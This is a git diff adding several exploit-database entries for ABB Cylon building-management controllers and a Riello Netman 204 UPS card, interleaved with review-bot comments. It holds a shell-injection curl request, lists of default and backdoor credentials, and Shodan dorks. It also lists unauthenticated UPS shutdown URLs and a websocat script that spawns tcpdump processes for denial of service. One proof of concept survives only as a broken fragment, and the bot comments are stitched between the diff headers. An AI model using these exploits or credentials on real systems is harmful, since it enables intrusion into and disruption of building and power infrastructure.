diff --git a/exploits/multiple/hardware/52178.txt b/exploits/multiple/hardware/52178.txt new file mode 100644 index 000000000..c7dd15e81 --- /dev/null +++ b/exploits/multiple/hardware/52178.txt 
@@ -0,0 +1,96 @@ +# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: An authenticated attacker can access sensitive information via the system logs +page of ABB Cylon FLXeon controllers. The logs expose critical data, including the +OpenSSL password for stored certificates. This information can be leveraged for further +attacks, such as decrypting encrypted communications, impersonation, or gaining deeper +system access. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5920 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php +CVE ID: CVE-2024-48852 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. 
| || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k "https://7.3.3.1/api/cmds" \ # JS > /diagnostics/logs-system (platform-dist) +> -H "Cookie: user_sid=xxx" \ +> -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}" + +-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. -- +Feb 13 12:38:26 node[5810]: at endReadableNT (_stream_readable.js:1059:12) +Feb 13 12:38:26 node[5810]: at IncomingMessage.emit (events.js:207:7) +Feb 13 12:38:26 node[5810]: at emitNone (events.js:105:13) +Feb 13 12:38:26 node[5810]: at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7) +Feb 13 12:38:26 node[5810]: at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7) +Feb 13 12:38:26 node[5810]: at invokeCallback (/home/MIX_CMIX/node-serve"} +... +... 
+Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" +Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" +Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' +Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' +Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/ +... +... \ No newline at end of file diff --git a/exploits/multiple/hardware/52179.txt b/exploits/multiple/hardware/52179.txt new file mode 100644 index 000000000..c42ed480b --- /dev/null +++ b/exploits/multiple/hardware/52179.txt 
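Review bot: The log line at the end of the hunk shows the certificate passphrase passed as `-passin pass:…` on the openssl command line, so the secret is exposed not only through the system-logs page but to anything that can read the process table while that command runs; the remediation should move the passphrase to `-passin file:` or stdin and redact command arguments before they are written to the journal. The curl example also shows `/api/cmds` accepting a shell pipeline as the JSON `cmd` value, which is what the logs page is built on, yet the text does not say what role that endpoint requires — worth stating explicitly. Defenders can search their own journal for `cmd = openssl req … -passin pass:` entries to gauge exposure and rotate the key and certificate if present. The header line also misspells `Title` as `Tiltle`.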
@@ -0,0 +1,79 @@ +ABB Cylon FLXeon 9.3.4 Default Credentials + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + ABB UC32 Series Main Plant Controllers (Cylon's UnitronUC32.xx) + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller uses a weak set of default administrative +credentials that can be guessed in remote password attacks and gain full control of +the system. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5919 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5919.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' 
'` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ cat cyloncreds.txt +admin:cylonctl +cxpro:siteguide +UC32Net:CylonCtl \ No newline at end of file diff --git a/exploits/multiple/hardware/52180.txt b/exploits/multiple/hardware/52180.txt new file mode 100644 index 000000000..bed7c5315 --- /dev/null +++ b/exploits/multiple/hardware/52180.txt 
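Review bot: The entry gives no fixed version, CVE or vendor reference — only `Firmware: <=9.3.4` — so a reader cannot tell whether any later firmware forces a credential change; adding the vendor's fix status would make it actionable. The mitigation side is also missing: these accounts need forced rotation on first login and lockout or rate limiting on the login endpoint, and bursts of failed logins against the listed account names are the detection signal to monitor. The `ABB UC32 Series` line in the affected list is the only place the third account's product is named; tying each credential row to its product line would avoid guesswork.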
@@ -0,0 +1,50 @@ +# Exploit title: ABB Cylon FLXeon 9.3.4 Limited Cross-Site Request Forgery +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: A CSRF vulnerability has been identified in the ABB Cylon FLXeon series. However, +exploitation is limited to specific conditions due to the server's CORS configuration +(Access-Control-Allow-Origin: * without Access-Control-Allow-Credentials: true). The +vulnerability can only be exploited under the following scenarios: + Same Domain: The attacker must host the malicious page on the same domain as the + target server. + Man-in-the-Middle (MitM): The attacker can intercept and modify traffic between + the user and the server (e.g., on an unsecured network). + Local Area Network (LAN) Access: The attacker must have access to the same network + as the target server. + Subdomains: The attacker can host the malicious page on a subdomain if the server + allows it. + Misconfigured CORS: The server’s CORS policy is misconfigured to allow certain + origins or headers. 
+ Reflected XSS: The attacker can exploit a reflected XSS vulnerability to execute + JavaScript in the context of the target origin. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5918 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5918.php \ No newline at end of file diff --git a/exploits/multiple/hardware/52182.txt b/exploits/multiple/hardware/52182.txt new file mode 100644 index 000000000..6ac0c850e --- /dev/null +++ b/exploits/multiple/hardware/52182.txt 
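Review bot: The entry contains no reproduction request, affected endpoint or parameter, so the CSRF claim cannot be verified from the text, unlike the other FLXeon entries in this commit which show the request. Most of the listed preconditions (same domain, MitM, LAN, subdomain, reflected XSS) describe an attacker who is already same-origin or on-path, and the CORS headers only constrain non-simple (preflighted) requests — a form-encoded POST is sent regardless — so the entry should state which content type the affected endpoint accepts. It would also help to say whether the session cookie carries `SameSite`, since `SameSite=Lax` or `Strict` plus a per-session anti-CSRF token on state-changing requests is the fix.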
@@ -0,0 +1,81 @@ +# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability +# Advisory ID: ZSL-2025-5916 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php +# CVE ID: CVE-2024-11317 +# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317 + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session +fixation, allowing an attacker to set a predefined PHPSESSID value. An +attacker can leverage an unauthenticated reflected XSS vulnerability in +jsonProxy.php to inject a crafted request, forcing the victim to adopt +a fixated session. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' 
'` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + + + +
+ + " /> + +
+ + \ No newline at end of file diff --git a/exploits/multiple/hardware/52183.txt b/exploits/multiple/hardware/52183.txt new file mode 100644 index 000000000..980205706 --- /dev/null +++ b/exploits/multiple/hardware/52183.txt 
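Review bot: The PoC body of this hunk did not survive extraction — after the banner only a fragment `" />` remains — so the crafted `jsonProxy.php` request that sets `PHPSESSID` is not reviewable here and the file's stated length (`+1,81`) does not match what is visible; check the advisory URL before relying on this copy. On the fix side, the description implies the application accepts a client-supplied session id without regenerating it at authentication: calling `session_regenerate_id(true)` after login and setting `session.use_strict_mode=1` (so PHP rejects uninitialised ids) closes the fixation regardless of the XSS, and output-encoding the reflected parameter closes the injection vector.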
@@ -0,0 +1,70 @@
+# Exploit Title: Netman 204 - Remote command with out authentication
+# Date: 2/4/2025
+# Exploit Author: parsa rezaie khiabanloo
+# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
+# Version: netman-204
+# Tested on: Windows/Linux
+
+Step 1 : Attacker can using these dorks then can find the UPS panel .
+
+Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin
+
+# We Found Two panel Yellow and blue
+
+Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups .
+
+Yellow Panel : username and password : eurek
+
+Some exploits for that :
+
+http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
+or
+https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
+
+Due to flaws in parameter validation, the URL can be shortened to:
+
+http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
+or
+https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
+
+
+Blue Panel : username and password : admin
+
+Some Critical leaks without authentication we can see :
+
+http://IP/administration-commands.html
+http://IP/administration.html
+http://IP/administration.html#
+http://IP/administration.html#LDAP
+http://IP/administration.html#active-users
+http://IP/administration.html#firmware-upgrade
+http://IP/configuration.html
+http://IP/history.html
+http://IP/index.html
+http://IP/login.html
+http://IP/system-overview.html
+http://IP/table.html
+
+#With using up paths we can see the details of the UPS without authentication .
+
+First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :)
+
+Some Remote commands without authentication :
+
+http://IP/administration-commands.html
+http://IP/administration-commands.html#
+http://IP/administration-commands.html#reboot-irms
+http://IP/administration-commands.html#reboot-mdu
+http://IP/administration-commands.html#reboot-xts
+http://IP/administration-commands.html#shutdown
+http://IP/administration-commands.html#shutdown-irms
+http://IP/administration-commands.html#shutdown-mdu
+http://IP/administration-commands.html#shutdown-restore
+http://IP/administration-commands.html#shutdown-restore-irms
+http://IP/administration-commands.html#shutdown-restore-mdu
+http://IP/administration-commands.html#shutdown-restore-xts
+http://IP/administration-commands.html#shutdown-xts
+http://IP/administration-commands.html#shutdownrestore
+http://IP/administration-commands.html#switch-irms
+http://IP/administration-commands.html#switch-on-bypass
+http://IP/administration-commands.html#test-battery
\ No newline at end of file
diff --git a/exploits/multiple/hardware/52184.txt b/exploits/multiple/hardware/52184.txt
new file mode 100644
index 000000000..2edfc01c1
--- /dev/null
+++ b/exploits/multiple/hardware/52184.txt
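Review bot: The "Remote commands without authentication" list at the end of the hunk consists of URL fragments (`#reboot-irms`, `#shutdown`, …); fragments are never sent to the server, so these entries only show that the static page contains those anchors, not that the backing CGI performs the action unauthenticated — the entry needs the actual request and response for one action, or the claim should be narrowed to disclosure of static pages. The header leaves `# Version: netman-204` without a firmware number and no CVE, so affected and fixed releases cannot be determined. For the fix, authentication must be enforced on `/cgi-bin/` and the HTML resources server-side rather than by client-side redirects, and the `eurek` account should be removed rather than documented; requests to `login.cgi` carrying that account name are the detection signal.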
@@ -0,0 +1,131 @@
+# ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
+ CBX Series (FLX Series)
+ CBT Series
+ CBV Series
+ Firmware: <=9.3.4
+# Advisory ID: ZSL-2025-5913
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5913.php
+# CVE ID: CVE-2024-48849
+# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48849
+
+Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
+series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
+building management solutions. ABB BACnet controllers are designed for intelligent
+control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
+heat pump systems, air handling units (constant volume, variable air volume, and
+multi-zone), rooftop units, electrical systems such as lighting control, variable
+frequency drives and metering.
+
+The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
+connectivity and open integration for your building automation systems. It's scalable,
+and modular, allowing you to control a diverse range of HVAC functions.
+
+Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to an unauthenticated
+WebSocket implementation that allows an attacker to execute the tcpdump command.
+This command captures network traffic and filters it on serial ports 4855 and 4851,
+which are relevant to the device's services. The vulnerability can be exploited in
+a loop to start multiple instances of tcpdump, leading to resource exhaustion, denial
+of service (DoS) conditions, and potential data exfiltration. The lack of authentication
+on the WebSocket interface allows unauthorized users to continuously spawn new tcpdump
+processes, amplifying the attack's impact.
+
+Tested on: Linux Kernel 5.4.27
+ Linux Kernel 4.15.13
+ NodeJS/8.4.0
+ Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+21.04.2024
+
+EOC
+
+cat << "EOF"
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+EOF
+echo -ne "\n-------------------------------------------------------"
+echo -ne "\nABB Cylon BACnet Building Controllers WebSocket Exploit"
+echo -ne "\n-------------------------------------------------------\n"
+if [ "$#" -ne 1 ]; then
+ echo -ne "\nUsage: $0 [ipaddr]\n\n"
+ exit
+fi
+IP=$1
+TARGET="wss://$IP:443/ws"
+PID=$!
+echo "$PID"
+
+STOP_SERVICE=`echo -e \
+"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\
+"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\
+"\x64\x22\x3A\x22\x73\x74\x6F\x70\x22\x2C\x22\x70\x61"\
+"\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65\x22"\
+"\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65\x72"\
+"\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A\x31"\
+"\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30\x7D"\
+"\x7D"` #stop tcpdump smartRouter capture
+
+START_SERVICE=`echo -e \
+"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\
+"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\
+"\x64\x22\x3A\x22\x73\x74\x61\x72\x74\x22\x2C\x22\x70"\
+"\x61\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65"\
+"\x22\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65"\
+"\x72\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A"\
+"\x31\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30"\
+"\x7D\x7D"` #start tcpdump smartRouter capture
+
+echo -e "\n[+] Sending JSONRPC => $START_SERVICE\n"
+sleep 1
+echo "$START_SERVICE"|
+websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
+sleep 2
+echo -e "\n[+] Sending JSONRPC => $STOP_SERVICE\n"
+sleep 1
+echo "$STOP_SERVICE"|
+websocat -k -1 -B 251 -n "$TARGET" -v
+echo -e "\n[*] Done"
+
+<< "LOG"
+$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager >log.txt; split -n 4 log.txt
+$ cat /usr/local/aam/var/xaa
+$ cat /usr/local/aam/var/xab
+$ cat /usr/local/aam/var/xac
+$ cat /usr/local/aam/var/xad
+...
+#Apr 21 23:12:51 kernel: device lo left promiscuous mode
+#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
+#Apr 21 23:12:34 node[196]: ws connect
+...
+LOG
\ No newline at end of file
diff --git a/exploits/multiple/hardware/52186.txt b/exploits/multiple/hardware/52186.txt
new file mode 100644
index 000000000..9f6dc15b2
--- /dev/null
+++ b/exploits/multiple/hardware/52186.txt
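Review bot: `PID=$!` at the end of the setup block is read before any background job exists — nothing earlier in the script is started with `&` — so `PID` is empty and the `echo "$PID"` that follows prints a blank line; both lines can go, and the usage branch should `exit 1` rather than bare `exit` so a wrong invocation is distinguishable from success. Encoding the two JSON-RPC messages as `\x..` escapes only makes the script harder to review, given that the trailing comments already say what each one is. From the defender's side the useful artefacts are in the LOG heredoc: `device lo entered promiscuous mode` kernel entries paired with `ws connect` from the node service are the signature of captures being started over the unauthenticated socket, and the fix is to authenticate the WebSocket upgrade and cap concurrent capture processes.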
@@ -0,0 +1,81 @@ +# Exploit title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE) +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote +root code execution via the /api/users/password endpoint. An attacker with valid +credentials can inject arbitrary system commands by manipulating the newPassword PUT +parameter. The issue arises in users.js, where the new password is hashed and improperly +escaped before being passed to ChildProcess.exec() within a usermod command, allowing +out of band (blind) command injection. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + 